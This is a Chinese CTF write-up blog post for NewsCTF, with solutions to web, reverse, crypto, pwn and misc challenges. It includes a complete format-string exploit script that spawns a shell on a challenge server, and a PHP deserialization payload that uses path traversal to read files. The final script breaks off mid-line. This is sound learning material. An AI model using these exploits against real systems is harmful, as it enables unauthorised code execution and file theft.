V3D4's Blog

安全技术记录/分享/交流

0%

NewsCTFWP

WEB

easy_web

md5解码是123456,用数组绕过md5强比较,用数组溢出绕过c(参考蓝帽杯one_point_php),payload如下

图片

得到压缩包密码,在网页背景图里,分离后解压即可

weblog

反序列化字符逃逸,直接上payload吧,凑了好久

1
O:1:"A":2:{s:1:"1";s:18:"flagflagflagflag??";s:1:"1";s:101:"1";s:10:"weblogfile";s:35:"flagflagflagflagflagflagflagflag???"/../../../../var/www/html/fflaglag.php";}

源码中第一个is_serialized函数检测的是数字后面指定位置是不是以”结束,所以最后会导致weblogfile中出现”,但是不影响读取,有一点很奇怪的事就是必须得以/../../.这样开头才能读取到flag,直接../../也不行,不知道为啥

RE

re_signin

套神把源码改的我不太看得懂,后来问他才知道统计下冒泡排序次数即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
s = '''[73, 69, 60, 20, 64, 68, 99, 4, 36, 9, 91, 42, 75, 43, 8, 77, 55, 70, 84, 37, 3, 93]
[85, 46, 47, 99, 58, 35, 83, 3, 57, 18, 52, 17, 97, 16, 6, 51, 84, 62, 1, 41, 88, 87]
[97, 34, 31, 80, 19, 57, 10, 84, 4, 50, 43, 63, 65, 88, 30, 72, 21, 36, 27, 41, 86, 79]
[31, 23, 68, 67, 30, 47, 27, 40, 73, 63, 11, 89, 18, 5, 9, 74, 88, 38, 8, 20, 50, 83]
[88, 5, 85, 82, 36, 74, 6, 15, 40, 55, 95, 8, 84, 47, 96, 33, 25, 29, 77, 67, 26, 39]
[54, 53, 0, 37, 66, 91, 39, 38, 57, 6, 47, 28, 49, 92, 29, 85, 88, 84, 90, 13, 35, 52]
[80, 18, 26, 91, 10, 52, 11, 99, 85, 75, 60, 48, 36, 74, 55, 51, 86, 49, 89, 29, 82, 16]
[35, 70, 42, 44, 18, 65, 84, 71, 26, 14, 38, 28, 21, 86, 20, 54, 30, 11, 66, 10, 69, 77]
[71, 25, 43, 23, 29, 6, 33, 44, 5, 30, 32, 18, 47, 13, 76, 8, 83, 87, 57, 26, 16, 19]
[29, 51, 7, 62, 94, 32, 57, 1, 71, 84, 92, 16, 18, 19, 56, 52, 40, 80, 98, 44, 82, 33]
[67, 14, 93, 91, 78, 80, 7, 37, 10, 82, 38, 83, 23, 27, 17, 76, 74, 18, 66, 24, 99, 43]
[29, 56, 44, 54, 70, 31, 10, 38, 8, 85, 18, 22, 32, 49, 2, 21, 50, 5, 25, 48, 90, 84]
[23, 33, 90, 7, 42, 71, 25, 58, 5, 47, 54, 18, 97, 72, 2, 1, 68, 64, 76, 85, 69, 49]
[77, 67, 52, 31, 35, 6, 56, 94, 81, 23, 78, 50, 15, 10, 28, 69, 43, 91, 82, 72, 99, 38]
[20, 47, 52, 27, 73, 64, 9, 62, 3, 57, 2, 97, 44, 35, 89, 10, 18, 29, 58, 56, 74, 84]
[66, 11, 76, 91, 70, 9, 6, 75, 32, 71, 44, 48, 88, 20, 98, 97, 79, 63, 47, 78, 60, 81]
[43, 13, 70, 23, 31, 69, 52, 30, 2, 78, 0, 37, 73, 93, 18, 1, 51, 62, 25, 68, 65, 87]
[24, 86, 29, 0, 93, 51, 53, 47, 16, 40, 94, 98, 88, 64, 41, 83, 44, 35, 45, 75, 17, 46]
[33, 12, 63, 77, 25, 24, 47, 58, 6, 89, 97, 27, 21, 96, 92, 50, 82, 76, 5, 62, 56, 44]
[12, 36, 16, 44, 19, 62, 43, 80, 58, 98, 69, 97, 1, 7, 49, 26, 70, 34, 53, 13, 65, 48]
[51, 74, 76, 98, 33, 78, 44, 45, 4, 65, 99, 84, 80, 93, 37, 56, 77, 9, 6, 94, 52, 88]
[80, 38, 88, 66, 7, 40, 70, 24, 2, 12, 76, 18, 57, 73, 58, 83, 33, 17, 89, 69, 77, 67]
[18, 53, 14, 24, 94, 42, 61, 75, 62, 60, 73, 2, 65, 48, 80, 23, 44, 91, 7, 0, 31, 71]
[16, 54, 87, 75, 8, 23, 33, 56, 22, 63, 1, 2, 25, 6, 84, 80, 4, 49, 17, 42, 14, 43]'''.split('\n')
for m in range(len(s)):
    nums = eval(s[m])
    count = 0
    for i in range(len(nums) - 1):
        for j in range(len(nums) - i - 1):
            if nums[j] > nums[(j + 1)]:
                nums[j], nums[j + 1] = nums[(j + 1)], nums[j]
                count+=1
    print(chr(count),end='')

Crypto

签到

base64->hextostr->base64->base32即可

RSA256

原题,flag都没改

https://blog.csdn.net/weixin_41676901/article/details/84897686

要做也很简单,从公钥里导n,e,n挺小的很好分解,然后常规做法就好了

big exponent

strving师傅大意了,n可以分解,不然不会,n扔到factordb上分解后常规做法即可

导出n,e

1
2
3
4
5
6
7
8
from Crypto.PublicKey import RSA
from Crypto.Util.number import bytes_to_long
path = 'pubkey3.pem'
with open(path) as f:
    key = RSA.import_key(f.read())
    print('e = %d' % key.e)
    print('n = %d' % key.n)
#14922959775784066499316528935316325825140011208871830627653191549546959775167708525042423039865322548420928571524120743831693550123563493981797950912895893476200447083386549353336086899064921878582074346791320104106139965010480614879592357793053342577850761108944086318475849882440272688246818022209356852924215237481460229377544297224983887026669222885987323082324044645883070916243439521809702674295469253723616677245762242494478587807402688474176102093482019417118703747411862420536240611089529331148684440513934609412884941091651594861530606086982174862461739604705354416587503836130151492937714365614194583664241

分解n
图片

求d和flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
from binascii import b2a_hex, a2b_hex
p = 101762447604961968347497011921099322367324119881977823223715806843654916018223203152717441386396615480134613864942068489600487206751473112264495957512819776729786840027245275219664091321087832913341367749452671938119115622233015167030327196487127307195872792552039408988207189866115101567965404039921455793363
q = 146645055489569596158773422326511843870914610026045288623162173369449741025994927278359852181645222010216728295790096211969513458244344811852179454305768973973420398459241985170762812039623053792853389316411927678494740679905048052776274447299638217155556426312374908963757267001415016478005573936685580868907
e = 65537
n1 = (p-1)*(q-1)
def computeD(fn, e):
    (x, y, r) = extendedGCD(fn, e)
    # y maybe < 0, so convert it
    if y < 0:
        return fn + y
    return y

def extendedGCD(a, b):
    # a*xi + b*yi = ri
    if b == 0:
        return (1, 0, a)
    # a*x1 + b*y1 = a
    x1 = 1
    y1 = 0
    # a*x2 + b*y2 = b
    x2 = 0
    y2 = 1
    while b != 0:
        q = a / b
        # ri = r(i-2) % r(i-1)
        r = a % b
        a = b
        b = r
        # xi = x(i-2) - q*x(i-1)
        x = x1 - q * x2
        x1 = x2
        x2 = x
        # yi = y(i-2) - q*y(i-1)
        y = y1 - q * y2
        y1 = y2
        y2 = y
    return (x1, y1, a)
d = computeD(n1, e)
print d
n = 14922959775784066499316528935316325825140011208871830627653191549546959775167708525042423039865322548420928571524120743831693550123563493981797950912895893476200447083386549353336086899064921878582074346791320104106139965010480614879592357793053342577850761108944086318475849882440272688246818022209356852924215237481460229377544297224983887026669222885987323082324044645883070916243439521809702674295469253723616677245762242494478587807402688474176102093482019417118703747411862420536240611089529331148684440513934609412884941091651594861530606086982174862461739604705354416587503836130151492937714365614194583664241
e = 65537
d = 1939800331566969231238499015822509112476429429000093460441850234380434721220893677233263681227591784640705105525336597901982046073250795813524219049192976738693434376052764300182646814671621671477801720559611455618661311349684672141832053588644909370595398536507540341289588555297140287641708389630308238553172611266699686889379601602610469415063423013345736857782550053021078819020067550134344105137814580449077427858909794966473721010515649636326903213468586689155646653944112043414898255582980672417192877508798211902504438276421956697069545353793760656596452907166622956502069975310714123208306176957819373985837
c = 13588308754487501762272172208712318470964859176652577458638024519480735855818472303106858749915814550461910418646406700170082046186554145725557043936145140194933021730755513423578786764011056162938992387100796757014593094008991782255713805995176848852766732112164930205392912473230406409264100813330524943900982304318443191423451054839557467742745949438737542068086381654151110306175775812710381629573025118044260105783919637399158227269427335571564198203340527807724651819028353642948898069219998495619755188155171878748423838578394494069031250303548302394317271641687619649147938309858970251498601554761618266353917
m = pow(c,d,n)
print m
# m转为str部分
m = str(hex(m))
m = m.replace('0x','').replace('L','')
print m
res = ''
print len(m)
for i in range(len(m)/2):
    # print m[i*2:i*2+2]
    tmp = int(m[i*2:i*2+2],16)
    # print tmp
    res = res + chr(tmp)
print res

字符串与字节

脑洞题,上面取一位下面取一位合起来再八位一转字符即可

1
2
3
4
5
6
7
from Crypto.Util.number import long_to_bytes
s1 = '010101100100010101110101010001010100010001000101010101100100011001010110011001000100010001000110011001100110010001100100010101100100010001010101010101010101010101000110'
s2 = ' 101010101001101111011001101101011011011101000100100100110110010010010101001101101010011101000011010101010101010000110111100001000101101010000110101010011000101001001111'
for i in range(len(s1)):
    print(s1[i]+s2[i+1],end='')
print()
print(long_to_bytes(int('011001100110110001100001011001110111101101100011011001010011001101100101001101010011000000110010011000110010110100110100001110000110001100111001001011010011010001100100001101010011000000101101001110010011100100111001001100000010110100110101011000100011100000110001011001000110001000110110011001100110001101100010011001100011000001111101',2)))

Pwn

61happy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
from pwn import *
# p = remote('81.68.86.115',10001)
elf = ELF('./qiandao')
libc = ELF('./libc-2.31.so')
context.log_level = 'debug'
#p = process('./qiandao')
p = remote('81.68.86.115', 10001)
payload = '%7$p-%9$p'
p.send(payload)
libc_base = int(p.recv(14), 16) - libc.symbols['__libc_start_main'] - 243
p.recvuntil('-')
stack_addr = int(p.recv(14), 16)
stack_addr = stack_addr - 176 - 0x40
shell = libc_base + 0xe6af1
pop_rdi = libc_base + 0x00276e9
binsh = libc_base + libc.search('/bin/sh').next()
system = libc_base + libc.symbols['system']
payload = '%' + str(stack_addr & 0xffff) + 'c%9$hnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str(pop_rdi & 0xffff) + 'c%37$hnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str(binsh & 0xffff) + 'c%37$hnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 2
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str((binsh >> 16) & 0xff) + 'c%37$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 8 + 8
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str(system & 0xffff) + 'c%37$hnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 8 + 8 + 2
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str((system >> 16) & 0xffff) + 'c%37$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 8 + 8 + 2 + 1
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str((system >> 24) & 0xff) + 'c%37$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 8 + 8 + 2 + 1 + 1
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str((system >> 32) & 0xff) + 'c%37$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 8 + 8 + 2 + 1 + 1 + 1
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str((system >> 40) & 0xff) + 'c%37$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '61happy\x00'
p.send(payload)
p.interactive()

MISC

very-ez-dump

搜索文件发现又flag.zip和hint.txt,hint里的内容说压缩包密码是用户密码,最后在cmdline里找到密码,过程不想重复了这里就不截图了,具体vol的命令自己网上搜

图片

图片

sign in

有密码的pdf,用apdfpr爆破下密码就好了,纯数字

图片

图片

Peltate

八神的题,被非预期了,放tweakpng里调成灰度图直接出了flag

图片

图片

每天一隐写,套神远离我,八神对套神的爱无处不在

base64 … or base56?

又是八神对套神的一次致敬,base64解码后补全八位再七位一组转字符即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import base64
s = 'm4enLzv56NeFBk37NnNAow7Oe9Br3b++5Bh5oMWHF156NeFBk37NnNYg59MOPXp3Z0GTfs2c1iDdl59NO7Ogyb9mzmsQUuvPnpw7kHTLhQZN+zZzWIN/JBS68+enDuQZN+zZzUoMPLKgwoOeXog35kHffvyZdyDJv2bOaDfmQZMuPllw89O7Og56fWVBw2YceXIg37sqDTu56cmVBh3b+mjLyXIKmjKg3YduVBtw9OXnfz0a8KxBs09MvLDs2eUCLZp6dNmVBtw9OW/ciWINPNBhQZNO3Tu69NPbKgzb+W1BvzIOmjKgpdefPTh3IM2Xbh2ZUGbTy59EG7DtyoEU3D05ed+7CiQb+SBFNw9OXnfz0YUS5BBQc8vRBvzINuHpy87+ejXh5oMe/dz08+nNBvzIMKDvv35Mu5Bm05+vLKsQd9GnHoQc8vDDyw9MvNBh6IOmjKg26cmTZlWIOm/ggzct+1Bi39Om/asQdN6Dll7ZcOxBhQc9uHZsy8kGbTn68sqDfmQdNGVBzw7cqDnv5dEGndz05MqxB30acehBow81iDTuQdOvLcsQYd2/poy8kGbTn68sqDTu56cmVBvzINPRYgw7siDnvQb9y5BU0ZUGbTy59EFLrz56cO5Buy8+mXIgyb9mxBzy9EHfDzQbcOTKg07kDFw5YIMXlB3378iDp15btO7Ogx8sObpz24dyDDuyIO+/fkQY8PLtl5IK2Hnp2eUFrt53+sm/Ho16dyDNy37UGFBky89OfcgxeUFPLyz5fKCbh2eevTTuWIO+jeg74eaDCgzb9mtBj5Yc3Tmg4YdO7pl5IMPRBBxcsO3pzy9t65BU5Ycmnpp37sOzZ5QdNGVBv69MvJBsw+cvJBp5oMKDvv24dyxBk5ZefPLkQadyDCg54eWHNh3LEGFBs37s6DDuyIOejDwy7MvPmg6csOTT00792HYgpdefPTh3IOGXDzw7uiDV128MvJBk5ZefNcgqaMqDNpz9eWXmg07uenJlQbcPlBiyoN+ZBh3eUGfLuyZeTtB00ZUHPbh2bMvPosQad27Ly27+fRBk37NiDTzQdPPDTjw7NnlBhQYsOLyg6deW7LkQZuW/agwoOendn2ZUHDTlx5UG/Mg779+Rcgm9cehBvzIOmjKgw8umnn05eUGnmg07kHTRlQcMOnd007s6DfmQZcOPQgyb9mxYg76NOPQgx4dyDFlQdsvLygy7MOLfyw9Mq5BU0ZUGTfs2c0G/N0y7kGbfs2b+6DCg6aMu3K7QdNGVB00ZduXmg24fKDth5eViDNy37UGbDp5eUHTDsyoMejDyw4+mXlzQdN6Cnv7acvRBsy4cmXlzXIJO5B00ZUHfLz6LEG3D05ed/PRrwoMm/Zs5oMPLKg35umXcg5Zc2Xlyy5EHTegw80GLDi689GvCgyb9mzmsQYsOLrz0a8KDblw7tO7OgRZ+WHdk27+mjLyRIN/JAi37MiDvv24dyJcgnRa9OHUje6e+/30ML7Hnf6aGd+PvyX9+a/Nw9OXnfz0a8P0='
s = base64.b64decode(s)
res = ''
for i in s:
    # print(i)
    res+=bin(i)[2:].zfill(8)
print(res)
tmp = ''
print(len(res))
for i in res:
    tmp+=i
    if len(tmp)==7:
        print(chr(int(tmp,2)),end='')
        tmp=''

happy六一

挺套的一个题还要用到pycc上的一个很少见的工具

先拿到一个happy和hint.txt,happy明显是倒过来的zip,写个脚本倒一下

1
2
3
4
5
f = open('happy','rb')
c = f.read()
f1 = open('hp.zip','wb')
f1.write(c[::-1])
f1.close()

解压hp.txt得到一下文件
图片

打开md发现只有六一两个字,结合文件名肯定是画图,先画出来

1
2
3
4
5
6
7
8
9
10
11
12
# from PIL import Image
# import matplotlib.pyplot as plt
# f = open('./hp/draw起来.md',encoding='utf-8')
# c = f.read().strip()
# img = Image.new('RGB',(383,311),(255,255,255))
# print(c[:383])
# for j in range(311):
#     for i in range(383):
#         # print(c[i+311*j])
#         if c[i+383*j]=='一':
#             img.putpixel((i,j),(0,0,0))
# img.save('draw.png')

图片

画出来发现没有任何卵用,不知道意义何在。。

再看到_key.png,文件名前面加了下划线,加上stegsolve里看到01通道有lsb,明显的stegpy特征,现在就是找密钥

在文件末尾发现一串01,八位一组转字符

1
2
3
4
5
6
7
8
# s = '01110000011101110110010000100000011010010111001100100000001100010011001000110011001101000011010100110110'
# tmp = ''
# for i in s:
#     tmp+=i
#     if len(tmp)==8:
#         # print(tmp)
#         print(chr(int(tmp,2)),end='')
#         tmp= ''

图片

得到stegpy密码123456

stegpy后得到一串base64,解密过程如下

1
2
3
4
stegpy
fERASmxgfD82SQ== base64
|D@Jl`|?6I base91
happy6.1

最后用Encrypto这个软件解密flag.crypto,得到一个flag.txt
图片

全选一下,明显是snow隐写特征

图片)图片

!了反都,了反

套神的题,在流量包里发现的倒过来的rar,导出那个rar包,写个脚本反过来

图片

图片

1
2
3
4
# f = open('123.rar','rb').read()
# f1 = open('flag.rar','wb')
# f1.write(f[::-1])
# f1.close()

打开rar发现密码是当前这个tcp流上面的密码,即passwd123
图片

图片

解压后得到前后颠倒的很多串base64,明显的base64隐写,把每一行倒过来后再找个base64隐写脚本解码即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
f = open('flag/flag.txt').readlines()
f1 = open('flag/tf.txt','w')
for i in f:
   f1.write(i.strip()[::-1]+'\n')
f1.close()
import re
import base64
b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
# ccc.txt为待解密的base64隐写字符串所在的文件
f = open('flag/tf.txt','r')
base64str = f.readline()
# pattern2用于匹配两个等号情况时,等号前的一个字符
# pattern2用于匹配一个等号情况时,等号前的一个字符
pattern2 = r'(\S)==$'
pattern1 = r'(\S)=$'
# 提取后的隐写二进制字符加入binstring中
binstring = ''
# 逐行读取待解密的base64隐写字符串,逐行处理
while(base64str):
    # 先匹配两个等号的情况,如果匹配不上,再配置一个等号的情况
    # 如果无等号,则没有隐藏,无需处理
    if re.compile(pattern2).findall(base64str):
        # mstr为等号前的一个字符,该字符为隐写二进制信息所在的字符
        mstr = re.compile(pattern2).findall(base64str)[0]
        # 确认mstr字符对应的base64二进制数,赋值给mbin
        mbin = bin(b64chars.find(mstr))
        # mbin格式如0b100,mbin[0:2]为0b
        # mbin[2:].zfill(6)为将0b后面的二进制数前面补0,使0b后面的长度为6
        mbin2 = mbin[0:2] + mbin[2:].zfill(6)
        # 两个等号情况隐写了4位二进制数,所以提取mbin2的后4bit
        # 赋值给stegobin,这就是隐藏的二进制信息
        stegobin = mbin2[-4:]
        binstring += stegobin
    elif re.compile(pattern1).findall(base64str):
        mstr = re.compile(pattern1).findall(base64str)[0]
        mbin = bin(b64chars.find(mstr))
        mbin2 = mbin[0:2] + mbin[2:].zfill(6)
        # 一个等号情况隐写了2位二进制数,所以提取mbin2的后2bit
        stegobin = mbin2[-2:]
        binstring += stegobin
    base64str = f.readline()
# stegobin将各行隐藏的二进制字符拼接在一起
# 从第0位开始,8bit、8bit处理,所以range的步进为8
for i in range(0,len(binstring),8):
    # int(xxx,2),将二进制字符串转换为10进制的整数,再用chr()转为字符
    print(chr(int(binstring[i:i+8],2)),end='')

🍞🧀🍞

套神的题,也是最套的一个题了应该

前面两步都可以用厨子一把梭(cyberchef)

图片

解压密码位祝好运

解压得到一个视频,视频后面分离下得到一个压缩包

图片)图片

视频打不开,盲猜异或,继续用厨子,视频比较大,需要跑一会

图片

异或0x63的时候出了,导出发现还是播放不了,拖到010里随便找个mp4对比下,发现套神是把第四位0x20改成了0x18,改回来就好了

图片

图片

打开视频发现是玩梗,最近很火的两面包夹芝士,而压缩包的密码就是up的名字

图片

图片

打开发现是一张宽度被改的png,crc32没问题,爆破下宽度即可,得到宽度为0x02bc,宽度正常后再拉高高度,得到一个蓝奏云地址

图片

图片

下载下来得到一个加密的压缩吧,注释里发现malbolge语言

图片

https://zb3.me/malbolge-tools/网站解码得到解压密码

图片

下载下来得到一个张我们联合.png

图片

观察文件末尾,发现明显的oursecret加密痕迹以及一句:明日方舟里为谁献出心脏?(5字符)

想起来b站两面包夹芝士视频p2里up主大喊过一句:为斯卡蒂献出心脏!https://www.bilibili.com/video/BV1bq4y177EK?p=2

所以oursecret密码为Skadi

记得的拖到oursecret解密的时候把后面那句话删掉,不然识别不到

图片

要这样子oursecret才能识别

图片

最后oursecret解码出一张一样的图片

图片

图片

本来一位不是盲水印就是xor,后来发现两张图都有lsb,经过套神提醒后才知道是两张图ADD后再lsb

图片

八神再次致敬套神,套了好多层

首先是一张二进制二维码,取https://online-barcode-reader.inliteresearch.com/解码后复制进winhex即可

图片

得到一个bz的压缩包,解压得到16张DataMatrix码

图片

一开始还没意识到,八神提醒后才知道,上面那个解码网站就有,麻了

图片

再将16张DataMatrix码按顺序拼成4*4的大码,去https://demo.dynamsoft.com/barcode-reader/解码,得到一大串base64

图片

解码发现是zip

图片

拿到zip后再解压发现是八神自己改编的brainfuck

图片

8+8-这种就代表有几个加号几个减号,写脚本一步步还原,或者拿notepad++手撸,我脚本写太拉了,一步步来的,先还原两位数+-,再还原一位数+-,最后还原一位数.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import re
# bf = '8+[->8+<]>16+.5-.<8+[->8-<]>8-.+.<4+[->4+<]>.<4+[->4-<]>4-3.8+.8-.<9+[->9+<]>3+.6-.<10+[->10+<]>7+.<10+[->10-<]>3-.<12+[->12+<]>20+.<9+[->9-<]>2-.<7+[->7+<]>8+.5+.<11+[->11-<]>16-.<9+[->9-<]>7-3.<7+[->7+<]>9+.<7+[->7-<]>5-.4-2.<3+[->3+<]>+.<3+[->3-<]>-3.<10+[->10+<]>.2+.7-.<4+[->4+<]>.6+.-.<8+[->8-<]>6-.<8+[->8+<]>6+.4+.4-.<10+[->10+<]>5+.<11+[->11-<]>17-.<5+[->5-<]>9-.<5+[->5-<]>10-.<3+[->3-<]>5-.<5+[->5+<]>8+.<5+[->5-<]>.<15+[->15+<]>18+.<7+[->7-<]>.<11+[->11-<]>20-.<12+[->12+<]>19+.<8+[->8-<]>2-.<8+[->8+<]>7+.<5+[->5-<]>10-.<6+[->6+<]>6+.<4+[->4+<]>3+.<15+[->15-<]>11-.8+.<10+[->10+<]>12+.<11+[->11-<]>2-.3+.<8+[->8+<]>10+.<10+[->10+<]>19+.<13+[->13-<]>19-.<12+[->12+<]>13+.<11+[->11-<]>10-.<3+[->3+<]>5+.<10+[->10+<]>17+.<10+[->10-<]>-.<8+[->8-<]>10-.<7+[->7+<]>14+.<5+[->5-<]>8-.<13+[->13+<]>21+.<14+[->14-<]>6-.<15+[->15+<]>5+.<10+[->10-<]>11-.3-.<10+[->10-<]>2-.<9+[->9+<]>17+.<10+[->10-<]>20-.<6+[->6+<]>8+.<12+[->12+<]>+.<12+[->12-<]>21-.<6+[->6+<]>3+.<8+[->8+<]>13+.<4+[->4+<]>3+.<8+[->8-<]>7-.<11+[->11+<]>10+.<12+[->12-<]>10-.<11+[->11+<]>8+.<8+[->8-<]>10-.<3+[->3-<]>4-.<10+[->10-<]>19-.<12+[->12+<]>13+.<12+[->12-<]>13-.<4+[->4+<]>5+.<4+[->4+<]>6+.<8+[->8+<]>5+.<7+[->7-<]>9-.<7+[->7-<]>.<11+[->11+<]>18+.<4+[->4-<]>7-.<8+[->8+<]>15+.<10+[->10-<]>.<8+[->8-<]>10-.<9+[->9+<]>6+.<10+[->10-<]>16-.<12+[->12+<]>4+.<3+[->3+<]>3+.<11+[->11-<]>14-.<9+[->9+<]>7+.<3+[->3-<]>5-.<10+[->10+<]>19+.<5+[->5+<]>+.6+.<15+[->15-<]>11-.<9+[->9+<]>9+.<10+[->10+<]>13+.<13+[->13-<]>3-.<8+[->8+<]>.<4+[->4-<]>3-.<5+[->5+<]>9+.<8+[->8+<]>2+.<10+[->10-<]>10-.<6+[->6+<]>9+.<4+[->4-<]>2-.<8+[->8-<]>12-.<5+[->5-<]>6-.<8+[->8+<]>15+.5-.<8+[->8-<]>10-.+.<7+[->7+<]>12+.<7+[->7-<]>14-.<4+[->4+<]>4+.<4+[->4-<]>4-3.8+.8-.<9+[->9+<]>3+.6-.<10+[->10+<]>7+.<10+[->10-<]>3-.<12+[->12+<]>20+.<9+[->9-<]>2-.<7+[->7+<]>8+.5+.<11+[->11-<]>16-.<9+[->9-<]>7-3.<7+[->7+<]>9+.<7+[->7-<]>5-.4-2.<3+[->3+<]>+.<3+[->3-<]>-.<6+[->6+<]>.<6+[->6-<]>7.<5+[->5+<]>7+.<5+[->5-<]>7-7.<10+[->10+<]>.2+.7-.<4+[->4+<]>.6+.-.<8+[->8-<]>6-.<8+[->8+<]>6+.4+.4-.<10+[->10-<]>6-.<3+[->3-<]>-.<5+[->5+<]>7+.<5+[->5-<]>7-5.+.-.<4+[->4+<]>8+.<4+[->4-<]>8-.<11+[->11+<]>15+.<7+[->7+<]>7+.<4+[->4+<]>8+.<11+[->11-<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<11+[->11+<]>13+.<14+[->14-<]>18-.<14+[->14+<]>27+.<11+[->11-<]>9-.<11+[->11+<]>+.<11+[->11-<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<11+[->11+<]>13+.<14+[->14-<]>18-.<14+[->14+<]>27+.<11+[->11-<]>9-.<11+[->11+<]>+.<11+[->11-<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<11+[->11+<]>13+.<14+[->14-<]>18-.<8+[->8+<]>15+.5-.<8+[->8-<]>6-.+.6-4.+.-.+.-.<9+[->9+<]>11+.<9+[->9-<]>11-3.<11+[->11+<]>7+.<11+[->11-<]>7-5.<'
# reg = re.compile(r'\d{2}[+-]')
# res = re.findall(reg,bf)
# rr = re.sub(reg,' ',bf).split(' ')
# print(len(res))
# print(len(rr))
# for i in range(len(res)):
#     print(rr[i],end='')
#     print(int(res[i][:2])*res[i][2],end='')
# print(rr[-1])
# bf = '8+[->8+<]>++++++++++++++++.5-.<8+[->8-<]>8-.+.<4+[->4+<]>.<4+[->4-<]>4-3.8+.8-.<9+[->9+<]>3+.6-.<++++++++++[->++++++++++<]>7+.<++++++++++[->----------<]>3-.<++++++++++++[->++++++++++++<]>++++++++++++++++++++.<9+[->9-<]>2-.<7+[->7+<]>8+.5+.<+++++++++++[->-----------<]>----------------.<9+[->9-<]>7-3.<7+[->7+<]>9+.<7+[->7-<]>5-.4-2.<3+[->3+<]>+.<3+[->3-<]>-3.<++++++++++[->++++++++++<]>.2+.7-.<4+[->4+<]>.6+.-.<8+[->8-<]>6-.<8+[->8+<]>6+.4+.4-.<++++++++++[->++++++++++<]>5+.<+++++++++++[->-----------<]>-----------------.<5+[->5-<]>9-.<5+[->5-<]>----------.<3+[->3-<]>5-.<5+[->5+<]>8+.<5+[->5-<]>.<+++++++++++++++[->+++++++++++++++<]>++++++++++++++++++.<7+[->7-<]>.<+++++++++++[->-----------<]>--------------------.<++++++++++++[->++++++++++++<]>+++++++++++++++++++.<8+[->8-<]>2-.<8+[->8+<]>7+.<5+[->5-<]>----------.<6+[->6+<]>6+.<4+[->4+<]>3+.<+++++++++++++++[->---------------<]>-----------.8+.<++++++++++[->++++++++++<]>++++++++++++.<+++++++++++[->-----------<]>2-.3+.<8+[->8+<]>++++++++++.<++++++++++[->++++++++++<]>+++++++++++++++++++.<+++++++++++++[->-------------<]>-------------------.<++++++++++++[->++++++++++++<]>+++++++++++++.<+++++++++++[->-----------<]>----------.<3+[->3+<]>5+.<++++++++++[->++++++++++<]>+++++++++++++++++.<++++++++++[->----------<]>-.<8+[->8-<]>----------.<7+[->7+<]>++++++++++++++.<5+[->5-<]>8-.<+++++++++++++[->+++++++++++++<]>+++++++++++++++++++++.<++++++++++++++[->--------------<]>6-.<+++++++++++++++[->+++++++++++++++<]>5+.<++++++++++[->----------<]>-----------.3-.<++++++++++[->----------<]>2-.<9+[->9+<]>+++++++++++++++++.<++++++++++[->----------<]>--------------------.<6+[->6+<]>8+.<++++++++++++[->++++++++++++<]>+.<++++++++++++[->------------<]>---------------------.<6+[->6+<]>3+.<8+[->8+<]>+++++++++++++.<4+[->4+<]>3+.<8+[->8-<]>7-.<+++++++++++[->+++++++++++<]>++++++++++.<++++++++++++[->------------<]>----------.<+++++++++++[->+++++++++++<]>8+.<8+[->8-<]>----------.<3+[->3-<]>4-.<++++++++++[->----------<]>-------------------.<++++++++++++[->++++++++++++<]>+++++++++++++.<++++++++++++[->------------<]>-------------.<4+[->4+<]>5+.<4+[->4+<]>6+.<8+[->8+<]>5+.<7+[->7-<]>9-.<7+[->7-<]>.<+++++++++++[->+++++++++++<]>++++++++++++++++++.<4+[->4-<]>7-.<8+[->8+<]>+++++++++++++++.<++++++++++[->----------<]>.<8+[->8-<]>----------.<9+[->9+<]>6+.<++++++++++[->----------<]>----------------.